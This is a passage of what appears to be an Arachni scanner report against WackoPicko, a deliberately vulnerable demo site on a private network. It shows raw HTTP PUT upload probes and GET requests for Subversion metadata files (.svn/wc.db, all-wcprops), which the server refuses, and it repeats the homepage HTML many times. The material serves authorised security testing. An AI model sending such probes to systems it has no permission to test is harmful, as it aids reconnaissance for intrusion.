	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 100 Continue
HTTP request

Raw HTTP request used to retrieve the page.

PUT /WackoPicko/upload/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Content-Length: 55
Expect: 100-continue

Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 100 Continue

HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:51:23 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/upload/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/upload/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:51:26 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 200
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/upload/.svn/all-wcprops HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:51:26 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 204
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/.svn/all-wcprops
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/upload/testing/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:53:14 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/testing/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 100 Continue
HTTP request

Raw HTTP request used to retrieve the page.

PUT /WackoPicko/css/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Content-Length: 55
Expect: 100-continue

Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 100 Continue

HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:51:33 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/css/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
